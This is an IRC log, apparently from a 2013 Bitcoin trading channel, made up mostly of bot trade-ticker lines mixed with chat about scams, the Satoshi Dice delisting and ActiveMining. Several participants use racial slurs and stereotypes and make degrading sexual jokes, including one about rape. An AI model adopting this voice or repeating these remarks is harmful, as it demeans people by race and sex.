18 03:56:32 [BTCTC] [TAT.ASICMINER] 5 @ 0.042121 = 0.2106 BTC [-] Jul 18 03:56:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.042121 = 0.2527 BTC [-] Jul 18 03:56:43 ;;rate bdk_kluge -10 long string of scams. one of bitcoin's worst. Jul 18 03:56:44 Rating entry successful. Your rating of -10 for user bdk_kluge has been recorded. Jul 18 03:57:06 [MPEX] [S.MPOE] 1391 @ 0.00088124 = 1.2258 BTC [+] Jul 18 03:57:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.042277 = 0.0846 BTC [+] Jul 18 03:57:20 [MPEX] [S.MPOE] 1683 @ 0.00088185 = 1.4842 BTC [+] Jul 18 03:57:22 [MPEX] [S.MPOE] 1180 @ 0.00088238 = 1.0412 BTC [+] Jul 18 03:57:35 [MPEX] [S.MPOE] 7896 @ 0.00088368 = 6.9775 BTC [+] Jul 18 03:57:37 [BTCTC] [AMC-PT] 30 @ 0.002491 = 0.0747 BTC [-] Jul 18 03:57:50 [BTCTC] [ASICMINER-PT] 1 @ 4.444 BTC [+] Jul 18 03:58:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.0422 = 0.1266 BTC [-] Jul 18 03:58:28 [BTCTC] [ASICMINER-PT] 1 @ 4.403 BTC [-] Jul 18 03:58:43 [BTCTC] [ASICMINER-PT] 1 @ 4.449821 BTC [+] Jul 18 03:59:08 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 18 03:59:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.042121 = 0.1264 BTC [-] Jul 18 04:00:15 [BTCTC] [AMC-PT] 29 @ 0.0025 = 0.0725 BTC [+] Jul 18 04:00:41 [HAVELOCK] [AM100] 1 @ 0.041849 BTC [+] Jul 18 04:01:52 [BTCTC] [ASICMINER-PT] 2 @ 4.350002 = 8.7 BTC [-] Jul 18 04:01:54 [BTCTC] [ASICMINER-PT] 2 @ 4.350002 = 8.7 BTC [-] Jul 18 04:01:56 [BTCTC] [ASICMINER-PT] 2 @ 4.350001 = 8.7 BTC [-] Jul 18 04:01:58 [BTCTC] [ASICMINER-PT] 3 @ 4.35 = 13.05 BTC [-] Jul 18 04:04:12 [HAVELOCK] [AM100] 6 @ 0.0418 = 0.2508 BTC [-] Jul 18 04:07:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.0422 = 0.2532 BTC [+] Jul 18 04:09:38 [BTCTC] [COGNITIVE] 1 @ 0.910101 BTC [-] Jul 18 04:09:40 [BTCTC] [COGNITIVE] 1 @ 0.9101 BTC [-] Jul 18 04:10:24 [BTCTC] [S.DICE-PT] 480 @ 0.0027 = 1.296 BTC [-] Jul 18 04:10:58 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 18 04:11:06 [BTCTC] [S.DICE-PT] 1 @ 0.0034 BTC [+] Jul 18 04:12:40 [BTCTC] [TAT.ASICMINER] 88 @ 0.0422 = 3.7136 BTC [+] Jul 18 04:16:44 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 18 04:17:45 [BTCTC] [AMC-PT] 103 @ 0.0025 = 0.2575 BTC [+] Jul 18 04:17:58 [BTCTC] [S.DICE-PT] 650 @ 0.0025 = 1.625 BTC [-] Jul 18 04:18:17 is kluge back or sumth? Jul 18 04:18:45 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 04:18:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.04222 = 0.4222 BTC [+] Jul 18 04:18:56 ;;getrating bdk_kludge Jul 18 04:18:56 This user has not yet been rated. WARNING: Currently not authenticated. Jul 18 04:19:11 whut Jul 18 04:19:21 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 18 04:19:25 ;;getrating bdk_kluge Jul 18 04:19:25 WARNING: Currently not authenticated. User bdk_kluge, rated since Sat May 5 18:54:59 2012. Cumulative rating 31, from 11 total ratings. Received ratings: 10 positive, 1 negative. Sent ratings: 13 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=bdk_kluge Jul 18 04:19:46 I always saw kluDge for some reason Jul 18 04:20:41 [BTCTC] [TAT.ASICMINER] 100 @ 0.04222 = 4.222 BTC [+] Jul 18 04:21:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.042201 = 0.2532 BTC [-] Jul 18 04:21:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.0422 = 0.5064 BTC [-] Jul 18 04:21:33 [BTCTC] [TAT.ASICMINER] 29 @ 0.042121 = 1.2215 BTC [-] Jul 18 04:22:02 [BTCTC] [COGNITIVE] 1 @ 0.910001 BTC [-] Jul 18 04:22:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.04222 = 0.1267 BTC [+] Jul 18 04:22:32 <[\\\]> and now mpex loses its major asset Jul 18 04:22:39 <[\\\]> what assets are left trading on mpex? Jul 18 04:22:43 [HAVELOCK] [AM1] 1 @ 4.49 BTC [-] Jul 18 04:22:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.04222 = 0.6333 BTC [+] Jul 18 04:23:13 [BTCTC] [S.DICE-PT] 8 @ 0.003469 = 0.0278 BTC [+] Jul 18 04:23:32 [HAVELOCK] [AM100] 1 @ 0.041799 BTC [-] Jul 18 04:23:54 [BTCTC] [ASICMINER-PT] 2 @ 4.324025 = 8.6481 BTC [-] Jul 18 04:23:56 [HAVELOCK] [AM100] 3 @ 0.041799 = 0.1254 BTC [-] Jul 18 04:24:01 [HAVELOCK] [AM100] 1 @ 0.041799 BTC [-] Jul 18 04:24:16 [BTCTC] [COGNITIVE] 1 @ 0.91 BTC [-] Jul 18 04:24:32 I have a feeling mpex will fill the gap Jul 18 04:24:53 [BTCTC] [COGNITIVE] 1 @ 0.901 BTC [-] Jul 18 04:25:37 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jul 18 04:25:52 [BTCTC] [LTC-ATF.B2] 1 @ 0.010051 BTC [-] Jul 18 04:25:54 [BTCTC] [LTC-ATF.B2] 1 @ 0.01005 BTC [-] Jul 18 04:26:37 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 18 04:28:17 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.0042 = 0.126 BTC [+] Jul 18 04:28:34 [BTCTC] [S.DICE-PT] 11 @ 0.0034 = 0.0374 BTC [-] Jul 18 04:31:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.042277 = 0.2114 BTC [+] Jul 18 04:31:51 [BTCTC] [COGNITIVE] 1 @ 0.875001 BTC [-] Jul 18 04:31:54 [BTCTC] [COGNITIVE] 1 @ 0.875 BTC [-] Jul 18 04:31:55 dat feels Jul 18 04:31:57 [BTCTC] [COGNITIVE] 1 @ 0.870001 BTC [-] Jul 18 04:31:59 [BTCTC] [COGNITIVE] 7 @ 0.870001 = 6.09 BTC [-] Jul 18 04:32:06 [BTCTC] [COGNITIVE] 4 @ 0.87 = 3.48 BTC [-] Jul 18 04:32:13 Should be filled with Coinroll, obviously... Jul 18 04:32:50 ThickAsThieves myeah. Jul 18 04:32:51 [BTCTC] [S.DICE-PT] 1 @ 0.0032 BTC [-] Jul 18 04:33:03 that seems to be the scammer consensus, lay low for six months, you're good as new. Jul 18 04:33:15 I totally don't have any interest in that occuring!! Jul 18 04:33:16 [\\\] workin Jul 18 04:33:20 [BTCTC] [BASIC-MINING] 2 @ 0.715008 = 1.43 BTC [-] Jul 18 04:33:21 ' on your sis Jul 18 04:34:00 [BTCTC] [BASIC-MINING] 2 @ 0.715008 = 1.43 BTC [-] Jul 18 04:34:21 [BTCTC] [BASIC-MINING] 3 @ 0.715007 = 2.145 BTC [-] Jul 18 04:34:41 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [-] Jul 18 04:34:56 [BTCTC] [BASIC-MINING] 1 @ 0.7105 BTC [-] Jul 18 04:35:04 You workin on my sis, you owe me money. There's a fee to mine on my property. Jul 18 04:35:43 [BTCTC] [S.DICE-PT] 1380 @ 0.0034 = 4.692 BTC [+] Jul 18 04:35:47 There, I answered for you. Jul 18 04:37:24 ;;ticker Jul 18 04:37:26 MtGox BTCUSD ticker | Best bid: 97.81000, Best ask: 98.24999, Bid-ask spread: 0.43999, Last trade: 98.26999, 24 hour volume: 12121.27288092, 24 hour low: 97.00000, 24 hour high: 100.00000, 24 hour vwap: 98.59307 Jul 18 04:37:49 heh we finally hit 100 Jul 18 04:38:18 [BTCTC] [S.DICE-PT] 609 @ 0.0034 = 2.0706 BTC [+] Jul 18 04:38:20 [BTCTC] [S.DICE-PT] 650 @ 0.0034 = 2.21 BTC [+] Jul 18 04:38:21 [BTCTC] [S.DICE-PT] 850 @ 0.00342 = 2.907 BTC [+] Jul 18 04:38:23 lol Jul 18 04:38:27 We had hit it some time ago... Jul 18 04:38:33 Price ain't moving. Jul 18 04:38:42 I wonder when will it fall. Jul 18 04:38:45 its been ~100 since forever. Jul 18 04:38:55 went a little under, ppl were all "omg, collapse, under 50" Jul 18 04:38:57 it didn't Jul 18 04:39:08 went a little over, like three times. ppl were all omg 500 again!!11 Jul 18 04:39:11 each time without fail. Jul 18 04:39:12 [BTCTC] [S.DICE-PT] 650 @ 0.00342 = 2.223 BTC [+] Jul 18 04:39:33 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 18 04:41:20 [BTCTC] [S.DICE-PT] 1 @ 0.00345 BTC [+] Jul 18 04:41:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.042277 = 0.1691 BTC [+] Jul 18 04:41:36 [BTCTC] [TAT.ASICMINER] 54 @ 0.042277 = 2.283 BTC [+] Jul 18 04:42:13 [BTCTC] [B.YABMC] 5 @ 0.002549 = 0.0127 BTC [+] Jul 18 04:42:37 [BTCTC] [S.DICE-PT] 40 @ 0.00345 = 0.138 BTC [+] Jul 18 04:42:45 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 18 04:43:33 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 04:45:20 [BTCTC] [ASICMINER-PT] 2 @ 4.431975 = 8.864 BTC [+] Jul 18 04:45:23 [BTCTC] [ASICMINER-PT] 1 @ 4.432 BTC [+] Jul 18 04:45:26 [BTCTC] [ASICMINER-PT] 1 @ 4.439999 BTC [+] Jul 18 04:45:29 [BTCTC] [ASICMINER-PT] 3 @ 4.44 = 13.32 BTC [+] Jul 18 04:46:23 [BTCTC] [BASIC-MINING] 1 @ 0.741999 BTC [+] Jul 18 04:47:10 [BTCTC] [TAT.ASICMINER] 100 @ 0.042277 = 4.2277 BTC [+] Jul 18 04:47:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.042277 = 0.1691 BTC [+] Jul 18 04:47:49 [BTCTC] [BASIC-MINING] 2 @ 0.741999 = 1.484 BTC [+] Jul 18 04:47:51 [BTCTC] [BASIC-MINING] 3 @ 0.742 = 2.226 BTC [+] Jul 18 04:48:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.042277 = 0.0846 BTC [+] Jul 18 04:49:42 http://gizoogle.net/xfer.php?link=http://mpex.co/&sa=U&ei=lUnnUfegC8qnhAeD5YH4AQ&ved=0CCEQFjAB&usg=AFQjCNF0Coa6ZiBEbn0PIe9W2BHnZtF-gw Jul 18 04:50:04 MPEx, tha Bitcoin securitizzles exchange. Jul 18 04:51:04 wtf is with gizoogle blowing up this week Jul 18 04:51:18 shit is old as fuck Jul 18 04:51:43 now its all over my twitter and shit Jul 18 04:52:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.042277 = 0.0846 BTC [+] Jul 18 04:53:02 you have the black advantage Jul 18 04:53:34 we're still trying to sort out the humpty dance Jul 18 04:53:43 [BTCTC] [DMS.MINING] 4 @ 0.0158 = 0.0632 BTC [+] Jul 18 04:53:58 [BTCTC] [BASIC-MINING] 1 @ 0.749999 BTC [+] Jul 18 04:54:00 [BTCTC] [BASIC-MINING] 2 @ 0.75 = 1.5 BTC [+] Jul 18 04:54:01 [BTCTC] [BASIC-MINING] 2 @ 0.750999 = 1.502 BTC [+] Jul 18 04:54:03 [BTCTC] [BASIC-MINING] 5 @ 0.751 = 3.755 BTC [+] Jul 18 04:54:04 [BTCTC] [BASIC-MINING] 4 @ 0.753999 = 3.016 BTC [+] Jul 18 04:54:23 [BTCTC] [BASIC-MINING] 4 @ 0.754 = 3.016 BTC [+] Jul 18 04:54:48 is "dub is black" the next installment of the "hash king is 15yo" bitcoin memefest ? Jul 18 04:55:10 [HAVELOCK] [SDSTM] 10 @ 0.01056 = 0.1056 BTC [-] Jul 18 04:55:23 is it coz I is black Jul 18 04:55:31 [BTCTC] [BASIC-MINING] 4 @ 0.754 = 3.016 BTC [+] Jul 18 04:55:48 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 18 04:56:42 [BTCTC] [BASIC-MINING] 1 @ 0.755 BTC [+] Jul 18 04:56:50 twas 13. Jul 18 04:59:03 [HAVELOCK] [HIM] 1 @ 0.29958883 BTC [+] Jul 18 04:59:05 [HAVELOCK] [HIM] 1 @ 0.29958884 BTC [+] Jul 18 04:59:22 [BTCTC] [ASICMINER-PT] 1 @ 4.444988 BTC [+] Jul 18 04:59:33 [BTCTC] [BASIC-MINING] 3 @ 0.76 = 2.28 BTC [+] Jul 18 04:59:38 [BTCTC] [AMC-PT] 96 @ 0.0025 = 0.24 BTC [+] Jul 18 04:59:39 [BTCTC] [S.DICE-PT] 10 @ 0.00345 = 0.0345 BTC [+] Jul 18 05:00:49 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 18 05:00:50 Yes dub. I'll revert that d and add ba at the end. I dub thee bubba, the generic troll fellow. Jul 18 05:01:31 Who keeps doing dub step, yes. Jul 18 05:02:12 I dub thee Bubba, the generic troll fellow who constantly does dub step. Jul 18 05:02:42 ok derpworld Jul 18 05:02:57 [BTCTC] [S.DICE-PT] 90 @ 0.00345 = 0.3105 BTC [+] Jul 18 05:03:32 and thestringpuller.. doesnt actually need derpifying Jul 18 05:03:38 'themasturbator' Jul 18 05:04:51 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 18 05:05:14 http://gizoogle.net/index.php?search=http%3A%2F%2Fmpex.co%2Ffaq.html&se=Gizoogle+Dis+Shiznit Jul 18 05:05:15 diablo is more nigger than you string and he is a ginger Jul 18 05:05:19 brb Jul 18 05:05:21 It's better on the FAQ. More text. Jul 18 05:05:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.042277 = 0.1268 BTC [+] Jul 18 05:06:29 [BTCTC] [COGNITIVE] 1 @ 0.870001 BTC [+] Jul 18 05:06:31 [BTCTC] [COGNITIVE] 7 @ 0.87 = 6.09 BTC [-] Jul 18 05:06:52 What tha fuck iz a MPSIC ? Jul 18 05:06:52 Short fo' Mircea Popescu Standard Identification Code. It aint nuthin but legit dat it aint straight-up standard yo, but on tha other hand itz straight-up code-y, so all dat shiznit evens up in tha end yo, but it ain't no stoppin cause I be still poppin'. Jul 18 05:07:04 [BTCTC] [ASICMINER-PT] 3 @ 4.444984 = 13.335 BTC [-] Jul 18 05:07:06 [BTCTC] [ASICMINER-PT] 2 @ 4.444985 = 8.89 BTC [+] Jul 18 05:07:08 [BTCTC] [ASICMINER-PT] 6 @ 4.445 = 26.67 BTC [+] Jul 18 05:07:10 [BTCTC] [ASICMINER-PT] 5 @ 4.44989 = 22.2495 BTC [+] Jul 18 05:07:12 [BTCTC] [ASICMINER-PT] 3 @ 4.4499 = 13.3497 BTC [+] Jul 18 05:07:14 [BTCTC] [ASICMINER-PT] 1 @ 4.44996 BTC [+] Jul 18 05:07:14 Talk about some damn good mumbo-jumbo Jul 18 05:07:16 [BTCTC] [ASICMINER-PT] 1 @ 4.449965 BTC [+] Jul 18 05:07:17 [BTCTC] [ASICMINER-PT] 1 @ 4.449968 BTC [+] Jul 18 05:07:20 [BTCTC] [ASICMINER-PT] 1 @ 4.449971 BTC [+] Jul 18 05:07:22 [BTCTC] [ASICMINER-PT] 1 @ 4.449971 BTC [+] Jul 18 05:07:24 [BTCTC] [ASICMINER-PT] 1 @ 4.449978 BTC [+] Jul 18 05:07:26 [BTCTC] [ASICMINER-PT] 2 @ 4.449981 = 8.9 BTC [+] Jul 18 05:07:27 [BTCTC] [ASICMINER-PT] 1 @ 4.449983 BTC [+] Jul 18 05:07:29 [BTCTC] [ASICMINER-PT] 2 @ 4.45 = 8.9 BTC [+] Jul 18 05:07:31 [BTCTC] [ASICMINER-PT] 1 @ 4.45999 BTC [+] Jul 18 05:07:33 [BTCTC] [ASICMINER-PT] 1 @ 4.465 BTC [+] Jul 18 05:07:35 [BTCTC] [ASICMINER-PT] 13 @ 4.469 = 58.097 BTC [+] Jul 18 05:07:36 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [+] Jul 18 05:07:38 [BTCTC] [ASICMINER-PT] 3 @ 4.484888 = 13.4547 BTC [+] Jul 18 05:07:40 [BTCTC] [ASICMINER-PT] 1 @ 4.484888 BTC [+] Jul 18 05:07:42 [BTCTC] [ASICMINER-PT] 8 @ 4.486 = 35.888 BTC [+] Jul 18 05:07:44 [BTCTC] [ASICMINER-PT] 10 @ 4.4989 = 44.989 BTC [+] Jul 18 05:07:46 [BTCTC] [ASICMINER-PT] 1 @ 4.499 BTC [+] Jul 18 05:07:47 [BTCTC] [ASICMINER-PT] 5 @ 4.5 = 22.5 BTC [+] Jul 18 05:07:49 [BTCTC] [ASICMINER-PT] 36 @ 4.5 = 162 BTC [+] Jul 18 05:08:15 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 18 05:08:16 somalia my friend, somalia. Jul 18 05:08:47 [BTCTC] [TAT.ASICMINER] 110 @ 0.042769 = 4.7046 BTC [+] Jul 18 05:10:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.042769 = 0.4277 BTC [+] Jul 18 05:12:18 What happens to mpex now that sdice gets delisted? Jul 18 05:12:32 profit? Jul 18 05:12:37 ^ Jul 18 05:12:39 And there is no none mircea business Jul 18 05:12:47 [BTCTC] [AMC-PT] 358 @ 0.0025 = 0.895 BTC [+] Jul 18 05:12:49 some dude caled tiberius is goign to buy it Jul 18 05:12:56 roflcakes Jul 18 05:12:58 There's still options if anyone is interested. Jul 18 05:12:59 s'wat I herd neway Jul 18 05:13:21 and speaking of black folks Jul 18 05:13:32 Dub heard you sour after buying sdice at 0.07 Jul 18 05:13:44 johnniewalker is so buck tooth hillbilly asswater Jul 18 05:13:51 so Jul 18 05:13:54 s/so/some Jul 18 05:14:08 so some Jul 18 05:14:16 you drink thank shit tiberius? Jul 18 05:14:21 That would be jack Daniel dub Jul 18 05:14:33 i like scotch myself Jul 18 05:14:37 [BTCTC] [AMC-PT] 8915 @ 0.0025 = 22.2875 BTC [+] Jul 18 05:14:40 mix it with your grape drank no doubt Jul 18 05:14:55 get dat hypnotiq in mah cup Jul 18 05:15:12 grey goose nigga grey goose Jul 18 05:15:30 awsheeeyet Jul 18 05:15:37 he gone step up to some cisco next Jul 18 05:15:45 [BTCTC] [ASICMINER-PT] 1 @ 4.499 BTC [-] Jul 18 05:16:18 wish i never linked the gizoogle thing Jul 18 05:16:23 TIL affirmitave action is call positive discrimination in the UK Jul 18 05:16:35 [MPEX] [S.MPOE] 12732 @ 0.00088055 = 11.2112 BTC [-] Jul 18 05:16:41 *affirmative Jul 18 05:16:43 some RED FLAVOR cisco and crack rock Jul 18 05:16:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.042767 = 0.2566 BTC [-] Jul 18 05:17:00 "bubbles" from the 7-11 Jul 18 05:17:28 naw g Jul 18 05:17:29 [BTCTC] [COGNITIVE] 1 @ 0.870001 BTC [+] Jul 18 05:17:31 [BTCTC] [COGNITIVE] 4 @ 0.87 = 3.48 BTC [-] Jul 18 05:17:37 yo dawg you got that spice Jul 18 05:18:02 asti spumante for tiberius' hoes Jul 18 05:18:22 [BTCTC] [S.DICE-PT] 50 @ 0.00345 = 0.1725 BTC [+] Jul 18 05:18:32 euro human toilets Jul 18 05:18:46 he bought them online Jul 18 05:18:49 chinawives.com Jul 18 05:18:55 they like to be shat on Jul 18 05:19:02 or in Jul 18 05:19:05 w/e Jul 18 05:19:07 ohe turr dat ass up Jul 18 05:21:40 [BTCTC] [AMC-PT] 21 @ 0.0025 = 0.0525 BTC [+] Jul 18 05:21:50 [BTCTC] [COGNITIVE] 1 @ 0.870001 BTC [+] Jul 18 05:21:52 [BTCTC] [COGNITIVE] 1 @ 0.87 BTC [-] Jul 18 05:21:53 https://www.youtube.com/watch?v=h1zGqRXZlnY Jul 18 05:21:55 TREAT ME LIKE A PIRATE- Flynt Flossy, Yung Humma, Whatchya (@Turquoisejeep) - YouTube Jul 18 05:21:58 ^tibbys shit Jul 18 05:22:42 [BTCTC] [COGNITIVE] 2 @ 0.87 = 1.74 BTC [-] Jul 18 05:25:57 [BTCTC] [S.DICE-PT] 7 @ 0.00343 = 0.024 BTC [-] Jul 18 05:26:02 chinawives are white, right ? Jul 18 05:28:36 [BTCTC] [GSDPT] 17 @ 0.0034 = 0.0578 BTC [-] Jul 18 05:29:14 [BTCTC] [AMC-PT] 238 @ 0.0025 = 0.595 BTC [+] Jul 18 05:29:47 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 18 05:30:31 bitcoin's first 'risk arb' trade? buy satoshi dice passthrus for the discount below tomorrow's cash takeout price Jul 18 05:30:56 [BTCTC] [AMC-PT] 1750 @ 0.0025 = 4.375 BTC [+] Jul 18 05:31:37 https://www.youtube.com/watch?v=uxi73RQlLB8&list=RD02h1zGqRXZlnY this is how jcpham rocks the party Jul 18 05:31:39 DID I MENTION I LIKE TO DANCE- Flynt Flossy (@Turquoisejeep) - YouTube Jul 18 05:31:55 [MPEX] [S.MPOE] 6992 @ 0.00087901 = 6.146 BTC [-] Jul 18 05:32:44 [BTCTC] [TAT.ASICMINER] 96 @ 0.04277 = 4.1059 BTC [+] Jul 18 05:32:45 [BTCTC] [TAT.ASICMINER] 617 @ 0.042775 = 26.3922 BTC [+] Jul 18 05:32:47 [BTCTC] [TAT.ASICMINER] 157 @ 0.0429 = 6.7353 BTC [+] Jul 18 05:34:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.043 = 2.15 BTC [+] Jul 18 05:37:24 [BTCTC] [S.DICE-PT] 1 @ 0.00343 BTC [-] Jul 18 05:37:30 toffoo bitcoin's first "someone sayin' what they'll be doin' bedfore they do it" too, at that. Jul 18 05:37:36 [BTCTC] [DMS.SELLING] 1 @ 0.024 BTC [+] Jul 18 05:39:09 Headline of the Day: "Number of Britons raped abroad rises" Jul 18 05:39:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.04325 = 0.1298 BTC [+] Jul 18 05:39:47 aww they already pulled the article Jul 18 05:39:57 this is kinda hard to believe, knowing how those brittons look Jul 18 05:42:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.0435 = 0.174 BTC [+] Jul 18 05:42:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.0435 = 0.435 BTC [+] Jul 18 05:42:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.0435 = 0.174 BTC [+] Jul 18 05:44:23 [HAVELOCK] [AM100] 157 @ 0.041785 = 6.5602 BTC [-] Jul 18 05:45:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.04325 = 0.2163 BTC [-] Jul 18 05:45:34 [HAVELOCK] [AM100] 5 @ 0.041785 = 0.2089 BTC [-] Jul 18 05:49:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.042767 = 0.1283 BTC [-] Jul 18 05:50:24 [HAVELOCK] [AM100] 71 @ 0.041785 = 2.9667 BTC [-] Jul 18 05:50:30 [BTCTC] [BASIC-MINING] 1 @ 0.76 BTC [+] Jul 18 05:50:43 [HAVELOCK] [AM100] 164 @ 0.041785 = 6.8527 BTC [-] Jul 18 05:50:44 [HAVELOCK] [AM100] 39 @ 0.041785 = 1.6296 BTC [-] Jul 18 05:51:10 [BTCTC] [DMS.SELLING] 1 @ 0.024235 BTC [+] Jul 18 05:58:21 [MPEX] [S.MPOE] 1904 @ 0.00088368 = 1.6825 BTC [+] Jul 18 05:58:23 [MPEX] [S.MPOE] 6096 @ 0.00088436 = 5.3911 BTC [+] Jul 18 06:00:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.042767 BTC [-] Jul 18 06:02:32 [BTCTC] [TAT.ASICMINER] 9 @ 0.042767 = 0.3849 BTC [-] Jul 18 06:06:27 [BTCTC] [ASICMINER-PT] 1 @ 4.43 BTC [+] Jul 18 06:09:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.042767 = 0.3849 BTC [-] Jul 18 06:10:01 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 18 06:10:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.042767 = 0.1283 BTC [-] Jul 18 06:14:22 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [+] Jul 18 06:14:48 ah Jul 18 06:14:51 Avoidance of all legal crises. Jul 18 06:14:59 ding ding Jul 18 06:15:42 http://i.imgur.com/SscbA.jpg Jul 18 06:15:53 inb4 there is no buyer and erik is bailing himself out of jail Jul 18 06:16:18 [BTCTC] [TAT.ASICMINER] 26 @ 0.042767 = 1.1119 BTC [-] Jul 18 06:16:47 Now for your enjoyment Jul 18 06:16:50 AMC labs Jul 18 06:16:50 https://www.flickr.com/photos/98907028@N08/9279242255/in/photostream/ Jul 18 06:16:52 [HAVELOCK] [AM100] 32 @ 0.041785 = 1.3371 BTC [-] Jul 18 06:16:54 2013-07-13 13.46.27_ts | Flickr - Photo Sharing! Jul 18 06:17:47 lolwat Jul 18 06:18:53 is the evil man mr ks? Jul 18 06:18:53 for realz Jul 18 06:18:57 yep Jul 18 06:19:28 nice crt bro Jul 18 06:20:00 lol this tops my imagination Jul 18 06:20:18 is that a bottle of lube? Jul 18 06:20:38 not because he looks funny or dumb, but because of his grimly face Jul 18 06:20:58 its alcohol hand sanitizer Jul 18 06:21:45 dude this will end up bigger than the ny tourist Jul 18 06:21:51 who are we looking at in this flickr photo Jul 18 06:21:59 active mining Jul 18 06:22:01 he is staring deep inside of me Jul 18 06:22:12 i'm feeling uncomfortable right now Jul 18 06:22:21 someone photochop him scowling at kim kardashian's asscrack Jul 18 06:22:21 if this shit isnt a scam.. Jul 18 06:22:28 [BTCTC] [DMS.SELLING] 28 @ 0.024235 = 0.6786 BTC [+] Jul 18 06:22:40 http://www.anorak.co.uk/258698/celebrities/kim-kardashians-new-nude-pictures-freak-her-out.html/?pid=32993#img Jul 18 06:22:42 take your pick Jul 18 06:22:43 THAT'S the ActiveMining guy? Jul 18 06:22:45 Anorak | Kim Kardashian’s New Nude Pictures Freak Her Out Jul 18 06:22:52 .bait Jul 18 06:22:56 http://25.media.tumblr.com/tumblr_m4bmy8muH81r64pjao1_500.jpg Jul 18 06:23:07 he looks like Dr Giggles Jul 18 06:23:30 http://www.dvdbeaver.com/film2/DVDReviews50/dr_giggles/drgiggles01.jpg Jul 18 06:23:39 https://www.flickr.com/photos/98907028@N08/9279241871/in/photostream/lightbox/ Jul 18 06:23:41 2013-07-13 13.52.16_ts | Flickr - Photo Sharing! Jul 18 06:23:45 power supplies in an office yo Jul 18 06:23:49 link doesn't work tat Jul 18 06:24:01 https://www.flickr.com/photos/98907028@N08/9279243243/in/photostream/lightbox/ Jul 18 06:24:04 2013-07-13 13.45.55_ts | Flickr - Photo Sharing! Jul 18 06:24:05 http://3.bp.blogspot.com/-ORlmsvgt-bg/Tknenyg2rdI/AAAAAAAAAag/wyYAxbzVO6c/s400/DrGiggles_14.jpg Jul 18 06:24:05 wiht fire plans Jul 18 06:24:10 his shit is so legit Jul 18 06:24:27 [BTCTC] [TAT.ASICMINER] 100 @ 0.0432 = 4.32 BTC [+] Jul 18 06:24:52 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 18 06:24:55 well.. this place is shady but big and it looks like it will be used for their stuff Jul 18 06:25:18 jcpham where did you see the fire plan ? Jul 18 06:25:24 [HAVELOCK] [AM100] 1 @ 0.041789 BTC [+] Jul 18 06:25:56 https://www.flickr.com/photos/98907028@N08/9279241891/in/photostream/lightbox/ Jul 18 06:25:59 go left and right Jul 18 06:26:08 2013-07-13 13.47.11_ts | Flickr - Photo Sharing! Jul 18 06:26:08 it's a whole album of legititude Jul 18 06:26:15 if sd money hits the market, they could fill am's ipo instantly Jul 18 06:26:44 maybe i should release my bond tomorrow! Jul 18 06:27:00 good idea Jul 18 06:27:36 [BTCTC] [COGNITIVE] 1 @ 0.880001 BTC [+] Jul 18 06:28:13 [BTCTC] [COGNITIVE] 5 @ 0.88 = 4.4 BTC [-] Jul 18 06:29:05 [BTCTC] [LTC-ATF.B2] 8 @ 0.01005 = 0.0804 BTC [-] Jul 18 06:29:21 [BTCTC] [DMS.SELLING] 32 @ 0.02401 = 0.7683 BTC [-] Jul 18 06:29:40 [BTCTC] [COGNITIVE] 8 @ 0.87 = 6.96 BTC [-] Jul 18 06:30:37 [BTCTC] [TAT.ASICMINER] 15 @ 0.0432 = 0.648 BTC [+] Jul 18 06:32:13 [HAVELOCK] [AM100] 50 @ 0.041103 = 2.0552 BTC [-] Jul 18 06:33:16 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 18 06:33:21 by babefoot ? Jul 18 06:33:23 totally needs kim. Jul 18 06:33:44 business license too: 